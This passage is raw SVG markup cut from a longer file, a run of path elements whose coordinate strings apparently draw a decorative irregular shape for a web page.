d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6